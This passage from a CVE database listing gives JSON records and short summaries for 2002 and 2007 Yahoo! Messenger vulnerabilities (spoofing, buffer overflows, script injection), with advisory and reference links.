"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "CA-2002-16",
"refsource": "CERT",
"url": "http://www.cert.org/advisories/CA-2002-16.html"
},
{
"name": "VU#137115",
"refsource": "CERT-VN",
"url": "http://www.kb.cert.org/vuls/id/137115"
},
{
"name": "20020527 Yahoo Messenger - Multiple Vulnerabilities",
"refsource": "BUGTRAQ",
"url": "http://online.securityfocus.com/archive/1/274223"
},
{
"name": "4837",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/4837"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2002-0031",
"datePublished": "2002-06-11T04:00:00",
"dateReserved": "2002-01-16T00:00:00",
"dateUpdated": "2024-08-08T02:35:17.601Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2002-0321 (GCVE-0-2002-0321)
Vulnerability from cvelistv5
Published
2002-05-03 04:00
Modified
2024-08-08 02:42
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- n/a
Summary
Yahoo! Messenger 5.0 allows remote attackers to spoof other users by modifying the username and using the spoofed username for social engineering or denial of service (flooding) attacks.
References
| ▼ | URL | Tags |
|---|---|---|
| http://www.iss.net/security_center/static/8267.php | vdb-entry, x_refsource_XF | |
| http://www.cert.org/advisories/CA-2002-16.html | third-party-advisory, x_refsource_CERT | |
| http://marc.info/?l=bugtraq&m=101439616623230&w=2 | mailing-list, x_refsource_BUGTRAQ | |
| http://www.kb.cert.org/vuls/id/952875 | third-party-advisory, x_refsource_CERT-VN | |
| http://www.securityfocus.com/bid/4164 | vdb-entry, x_refsource_BID |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-08T02:42:29.169Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "yahoo-messenger-username-spoof(8267)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "http://www.iss.net/security_center/static/8267.php"
},
{
"name": "CA-2002-16",
"tags": [
"third-party-advisory",
"x_refsource_CERT",
"x_transferred"
],
"url": "http://www.cert.org/advisories/CA-2002-16.html"
},
{
"name": "20020221 Remote crashes in Yahoo messenger",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://marc.info/?l=bugtraq\u0026m=101439616623230\u0026w=2"
},
{
"name": "VU#952875",
"tags": [
"third-party-advisory",
"x_refsource_CERT-VN",
"x_transferred"
],
"url": "http://www.kb.cert.org/vuls/id/952875"
},
{
"name": "4164",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/4164"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2002-02-21T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Yahoo! Messenger 5.0 allows remote attackers to spoof other users by modifying the username and using the spoofed username for social engineering or denial of service (flooding) attacks."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2016-10-17T13:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "yahoo-messenger-username-spoof(8267)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "http://www.iss.net/security_center/static/8267.php"
},
{
"name": "CA-2002-16",
"tags": [
"third-party-advisory",
"x_refsource_CERT"
],
"url": "http://www.cert.org/advisories/CA-2002-16.html"
},
{
"name": "20020221 Remote crashes in Yahoo messenger",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://marc.info/?l=bugtraq\u0026m=101439616623230\u0026w=2"
},
{
"name": "VU#952875",
"tags": [
"third-party-advisory",
"x_refsource_CERT-VN"
],
"url": "http://www.kb.cert.org/vuls/id/952875"
},
{
"name": "4164",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/4164"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2002-0321",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Yahoo! Messenger 5.0 allows remote attackers to spoof other users by modifying the username and using the spoofed username for social engineering or denial of service (flooding) attacks."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "yahoo-messenger-username-spoof(8267)",
"refsource": "XF",
"url": "http://www.iss.net/security_center/static/8267.php"
},
{
"name": "CA-2002-16",
"refsource": "CERT",
"url": "http://www.cert.org/advisories/CA-2002-16.html"
},
{
"name": "20020221 Remote crashes in Yahoo messenger",
"refsource": "BUGTRAQ",
"url": "http://marc.info/?l=bugtraq\u0026m=101439616623230\u0026w=2"
},
{
"name": "VU#952875",
"refsource": "CERT-VN",
"url": "http://www.kb.cert.org/vuls/id/952875"
},
{
"name": "4164",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/4164"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2002-0321",
"datePublished": "2002-05-03T04:00:00",
"dateReserved": "2002-05-01T00:00:00",
"dateUpdated": "2024-08-08T02:42:29.169Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2007-3148 (GCVE-0-2007-3148)
Vulnerability from cvelistv5
Published
2007-06-11 18:00
Modified
2024-08-07 14:05
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- n/a
Summary
Buffer overflow in the Yahoo! Webcam Viewer ActiveX control in ywcvwr.dll 2.0.1.4 for Yahoo! Messenger 8.1.0.249 allows remote attackers to execute arbitrary code via a long server property value to the receive method.
References
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T14:05:29.296Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "4043",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB",
"x_transferred"
],
"url": "https://www.exploit-db.com/exploits/4043"
},
{
"name": "yahoo-webcam-viewer-bo(34759)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34759"
},
{
"name": "37081",
"tags": [
"vdb-entry",
"x_refsource_OSVDB",
"x_transferred"
],
"url": "http://osvdb.org/37081"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://research.eeye.com/html/advisories/upcoming/20070605.html"
},
{
"name": "24355",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/24355"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://messenger.yahoo.com/security_update.php?id=060707"
},
{
"name": "ADV-2007-2094",
"tags": [
"vdb-entry",
"x_refsource_VUPEN",
"x_transferred"
],
"url": "http://www.vupen.com/english/advisories/2007/2094"
},
{
"name": "25547",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/25547"
},
{
"name": "20070608 EEYE: Yahoo Webcam ActiveX Controls Multiple Buffer Overflows",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://www.securityfocus.com/archive/1/470861/100/0/threaded"
},
{
"name": "1018204",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK",
"x_transferred"
],
"url": "http://securitytracker.com/id?1018204"
},
{
"name": "20070607 2nd Yahoo 0day ActiveX Exploit",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "http://lists.grok.org.uk/pipermail/full-disclosure/2007-June/063819.html"
},
{
"name": "24341",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/24341"
},
{
"name": "1018203",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK",
"x_transferred"
],
"url": "http://www.securitytracker.com/id?1018203"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://research.eeye.com/html/advisories/published/AD20070608.html"
},
{
"name": "VU#932217",
"tags": [
"third-party-advisory",
"x_refsource_CERT-VN",
"x_transferred"
],
"url": "http://www.kb.cert.org/vuls/id/932217"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2007-06-07T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Buffer overflow in the Yahoo! Webcam Viewer ActiveX control in ywcvwr.dll 2.0.1.4 for Yahoo! Messenger 8.1.0.249 allows remote attackers to execute arbitrary code via a long server property value to the receive method."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-10-16T14:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "4043",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB"
],
"url": "https://www.exploit-db.com/exploits/4043"
},
{
"name": "yahoo-webcam-viewer-bo(34759)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34759"
},
{
"name": "37081",
"tags": [
"vdb-entry",
"x_refsource_OSVDB"
],
"url": "http://osvdb.org/37081"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://research.eeye.com/html/advisories/upcoming/20070605.html"
},
{
"name": "24355",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/24355"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://messenger.yahoo.com/security_update.php?id=060707"
},
{
"name": "ADV-2007-2094",
"tags": [
"vdb-entry",
"x_refsource_VUPEN"
],
"url": "http://www.vupen.com/english/advisories/2007/2094"
},
{
"name": "25547",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/25547"
},
{
"name": "20070608 EEYE: Yahoo Webcam ActiveX Controls Multiple Buffer Overflows",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://www.securityfocus.com/archive/1/470861/100/0/threaded"
},
{
"name": "1018204",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK"
],
"url": "http://securitytracker.com/id?1018204"
},
{
"name": "20070607 2nd Yahoo 0day ActiveX Exploit",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "http://lists.grok.org.uk/pipermail/full-disclosure/2007-June/063819.html"
},
{
"name": "24341",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/24341"
},
{
"name": "1018203",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK"
],
"url": "http://www.securitytracker.com/id?1018203"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://research.eeye.com/html/advisories/published/AD20070608.html"
},
{
"name": "VU#932217",
"tags": [
"third-party-advisory",
"x_refsource_CERT-VN"
],
"url": "http://www.kb.cert.org/vuls/id/932217"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2007-3148",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Buffer overflow in the Yahoo! Webcam Viewer ActiveX control in ywcvwr.dll 2.0.1.4 for Yahoo! Messenger 8.1.0.249 allows remote attackers to execute arbitrary code via a long server property value to the receive method."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "4043",
"refsource": "EXPLOIT-DB",
"url": "https://www.exploit-db.com/exploits/4043"
},
{
"name": "yahoo-webcam-viewer-bo(34759)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34759"
},
{
"name": "37081",
"refsource": "OSVDB",
"url": "http://osvdb.org/37081"
},
{
"name": "http://research.eeye.com/html/advisories/upcoming/20070605.html",
"refsource": "MISC",
"url": "http://research.eeye.com/html/advisories/upcoming/20070605.html"
},
{
"name": "24355",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/24355"
},
{
"name": "http://messenger.yahoo.com/security_update.php?id=060707",
"refsource": "CONFIRM",
"url": "http://messenger.yahoo.com/security_update.php?id=060707"
},
{
"name": "ADV-2007-2094",
"refsource": "VUPEN",
"url": "http://www.vupen.com/english/advisories/2007/2094"
},
{
"name": "25547",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/25547"
},
{
"name": "20070608 EEYE: Yahoo Webcam ActiveX Controls Multiple Buffer Overflows",
"refsource": "BUGTRAQ",
"url": "http://www.securityfocus.com/archive/1/470861/100/0/threaded"
},
{
"name": "1018204",
"refsource": "SECTRACK",
"url": "http://securitytracker.com/id?1018204"
},
{
"name": "20070607 2nd Yahoo 0day ActiveX Exploit",
"refsource": "FULLDISC",
"url": "http://lists.grok.org.uk/pipermail/full-disclosure/2007-June/063819.html"
},
{
"name": "24341",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/24341"
},
{
"name": "1018203",
"refsource": "SECTRACK",
"url": "http://www.securitytracker.com/id?1018203"
},
{
"name": "http://research.eeye.com/html/advisories/published/AD20070608.html",
"refsource": "MISC",
"url": "http://research.eeye.com/html/advisories/published/AD20070608.html"
},
{
"name": "VU#932217",
"refsource": "CERT-VN",
"url": "http://www.kb.cert.org/vuls/id/932217"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2007-3148",
"datePublished": "2007-06-11T18:00:00",
"dateReserved": "2007-06-11T00:00:00",
"dateUpdated": "2024-08-07T14:05:29.296Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2007-3928 (GCVE-0-2007-3928)
Vulnerability from cvelistv5
Published
2007-07-21 00:00
Modified
2024-08-07 14:37
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- n/a
Summary
Buffer overflow in Yahoo! Messenger 8.1 allows user-assisted remote authenticated users to execute arbitrary code via a long e-mail address in an address book entry. NOTE: this might overlap CVE-2007-3638.
References
| ▼ | URL | Tags |
|---|---|---|
| http://secunia.com/advisories/26066 | third-party-advisory, x_refsource_SECUNIA | |
| http://www.xdisclose.com/advisory/XD100002.html | x_refsource_MISC | |
| http://www.securityfocus.com/bid/24926 | vdb-entry, x_refsource_BID | |
| http://www.securitytracker.com/id?1018398 | vdb-entry, x_refsource_SECTRACK | |
| http://securityreason.com/securityalert/2906 | third-party-advisory, x_refsource_SREASON | |
| https://exchange.xforce.ibmcloud.com/vulnerabilities/35434 | vdb-entry, x_refsource_XF | |
| http://lists.grok.org.uk/pipermail/full-disclosure/2007-July/064669.html | mailing-list, x_refsource_FULLDISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T14:37:04.515Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "26066",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/26066"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.xdisclose.com/advisory/XD100002.html"
},
{
"name": "24926",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/24926"
},
{
"name": "1018398",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK",
"x_transferred"
],
"url": "http://www.securitytracker.com/id?1018398"
},
{
"name": "2906",
"tags": [
"third-party-advisory",
"x_refsource_SREASON",
"x_transferred"
],
"url": "http://securityreason.com/securityalert/2906"
},
{
"name": "yahoo-messenger-address-book-bo(35434)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/35434"
},
{
"name": "20070716 Yahoo Messenger 8.1 Buffer Overflow",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "http://lists.grok.org.uk/pipermail/full-disclosure/2007-July/064669.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2007-07-16T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Buffer overflow in Yahoo! Messenger 8.1 allows user-assisted remote authenticated users to execute arbitrary code via a long e-mail address in an address book entry. NOTE: this might overlap CVE-2007-3638."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2017-07-28T12:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "26066",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/26066"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.xdisclose.com/advisory/XD100002.html"
},
{
"name": "24926",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/24926"
},
{
"name": "1018398",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK"
],
"url": "http://www.securitytracker.com/id?1018398"
},
{
"name": "2906",
"tags": [
"third-party-advisory",
"x_refsource_SREASON"
],
"url": "http://securityreason.com/securityalert/2906"
},
{
"name": "yahoo-messenger-address-book-bo(35434)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/35434"
},
{
"name": "20070716 Yahoo Messenger 8.1 Buffer Overflow",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "http://lists.grok.org.uk/pipermail/full-disclosure/2007-July/064669.html"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2007-3928",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Buffer overflow in Yahoo! Messenger 8.1 allows user-assisted remote authenticated users to execute arbitrary code via a long e-mail address in an address book entry. NOTE: this might overlap CVE-2007-3638."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "26066",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/26066"
},
{
"name": "http://www.xdisclose.com/advisory/XD100002.html",
"refsource": "MISC",
"url": "http://www.xdisclose.com/advisory/XD100002.html"
},
{
"name": "24926",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/24926"
},
{
"name": "1018398",
"refsource": "SECTRACK",
"url": "http://www.securitytracker.com/id?1018398"
},
{
"name": "2906",
"refsource": "SREASON",
"url": "http://securityreason.com/securityalert/2906"
},
{
"name": "yahoo-messenger-address-book-bo(35434)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/35434"
},
{
"name": "20070716 Yahoo Messenger 8.1 Buffer Overflow",
"refsource": "FULLDISC",
"url": "http://lists.grok.org.uk/pipermail/full-disclosure/2007-July/064669.html"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2007-3928",
"datePublished": "2007-07-21T00:00:00",
"dateReserved": "2007-07-20T00:00:00",
"dateUpdated": "2024-08-07T14:37:04.515Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2002-0032 (GCVE-0-2002-0032)
Vulnerability from cvelistv5
Published
2003-04-02 05:00
Modified
2024-08-08 02:35
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- n/a
Summary
Yahoo! Messenger 5,0,0,1064 and earlier allows remote attackers to execute arbitrary script as other users via the addview parameter of a ymsgr URI.
References
| ▼ | URL | Tags |
|---|---|---|
| http://www.cert.org/advisories/CA-2002-16.html | third-party-advisory, x_refsource_CERT | |
| http://online.securityfocus.com/archive/1/274223 | mailing-list, x_refsource_BUGTRAQ | |
| http://www.securityfocus.com/bid/4838 | vdb-entry, x_refsource_BID | |
| http://www.kb.cert.org/vuls/id/172315 | third-party-advisory, x_refsource_CERT-VN | |
| http://www.iss.net/security_center/static/9184.php | vdb-entry, x_refsource_XF |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-08T02:35:17.488Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "CA-2002-16",
"tags": [
"third-party-advisory",
"x_refsource_CERT",
"x_transferred"
],
"url": "http://www.cert.org/advisories/CA-2002-16.html"
},
{
"name": "20020527 Yahoo Messenger - Multiple Vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://online.securityfocus.com/archive/1/274223"
},
{
"name": "4838",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/4838"
},
{
"name": "VU#172315",
"tags": [
"third-party-advisory",
"x_refsource_CERT-VN",
"x_transferred"
],
"url": "http://www.kb.cert.org/vuls/id/172315"
},
{
"name": "yahoo-messenger-script-injection(9184)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "http://www.iss.net/security_center/static/9184.php"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2002-05-27T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Yahoo! Messenger 5,0,0,1064 and earlier allows remote attackers to execute arbitrary script as other users via the addview parameter of a ymsgr URI."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2003-03-19T00:00:00",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "CA-2002-16",
"tags": [
"third-party-advisory",
"x_refsource_CERT"
],
"url": "http://www.cert.org/advisories/CA-2002-16.html"
},
{
"name": "20020527 Yahoo Messenger - Multiple Vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://online.securityfocus.com/archive/1/274223"
},
{
"name": "4838",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/4838"
},
{
"name": "VU#172315",
"tags": [
"third-party-advisory",
"x_refsource_CERT-VN"
],
"url": "http://www.kb.cert.org/vuls/id/172315"
},
{
"name": "yahoo-messenger-script-injection(9184)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "http://www.iss.net/security_center/static/9184.php"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2002-0032",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Yahoo! Messenger 5,0,0,1064 and earlier allows remote attackers to execute arbitrary script as other users via the addview parameter of a ymsgr URI."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "CA-2002-16",
"refsource": "CERT",
"url": "http://www.cert.org/advisories/CA-2002-16.html"
},
{
"name": "20020527 Yahoo Messenger - Multiple Vulnerabilities",
"refsource": "BUGTRAQ",
"url": "http://online.securityfocus.com/archive/1/274223"
},
{
"name": "4838",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/4838"
},
{
"name": "VU#172315",
"refsource": "CERT-VN",
"url": "http://www.kb.cert.org/vuls/id/172315"
},
{
"name": "yahoo-messenger-script-injection(9184)",
"refsource": "XF",
"url": "http://www.iss.net/security_center/static/9184.php"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2002-0032",
"datePublished": "2003-04-02T05:00:00",
"dateReserved": "2002-01-16T00:00:00",
"dateUpdated": "2024-08-08T02:35:17.488Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2002-0320 (GCVE-0-2002-0320)
Vulnerability from cvelistv5
Published
2002-05-03 04:00
Modified
2024-08-08 02:42
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- n/a
Summary
Buffer overflow in Yahoo! Messenger 5.0 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a long (1) message or (2) IMvironment field.
References
| ▼ | URL | Tags |
|---|---|---|
| http://www.securityfocus.com/bid/4162 | vdb-entry, x_refsource_BID | |
| http://www.kb.cert.org/vuls/id/887319 | third-party-advisory, x_refsource_CERT-VN | |
| http://www.cert.org/advisories/CA-2002-16.html | third-party-advisory, x_refsource_CERT | |
| http://marc.info/?l=bugtraq&m=101439616623230&w=2 | mailing-list, x_refsource_BUGTRAQ | |
| http://www.kb.cert.org/vuls/id/419419 | third-party-advisory, x_refsource_CERT-VN | |
| http://www.iss.net/security_center/static/8265.php | vdb-entry, x_refsource_XF | |
| http://www.iss.net/security_center/static/8264.php | vdb-entry, x_refsource_XF | |
| http://www.securityfocus.com/bid/4163 | vdb-entry, x_refsource_BID |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-08T02:42:29.167Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "4162",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/4162"
},
{
"name": "VU#887319",
"tags": [
"third-party-advisory",
"x_refsource_CERT-VN",
"x_transferred"
],
"url": "http://www.kb.cert.org/vuls/id/887319"
},
{
"name": "CA-2002-16",
"tags": [
"third-party-advisory",
"x_refsource_CERT",
"x_transferred"
],
"url": "http://www.cert.org/advisories/CA-2002-16.html"
},
{
"name": "20020221 Remote crashes in Yahoo messenger",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://marc.info/?l=bugtraq\u0026m=101439616623230\u0026w=2"
},
{
"name": "VU#419419",
"tags": [
"third-party-advisory",
"x_refsource_CERT-VN",
"x_transferred"
],
"url": "http://www.kb.cert.org/vuls/id/419419"
},
{
"name": "yahoo-messenger-imvironment-bo(8265)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "http://www.iss.net/security_center/static/8265.php"
},
{
"name": "yahoo-messenger-message-bo(8264)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "http://www.iss.net/security_center/static/8264.php"
},
{
"name": "4163",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/4163"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2002-02-21T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Buffer overflow in Yahoo! Messenger 5.0 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a long (1) message or (2) IMvironment field."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2016-10-17T13:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "4162",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/4162"
},
{
"name": "VU#887319",
"tags": [
"third-party-advisory",
"x_refsource_CERT-VN"
],
"url": "http://www.kb.cert.org/vuls/id/887319"
},
{
"name": "CA-2002-16",
"tags": [
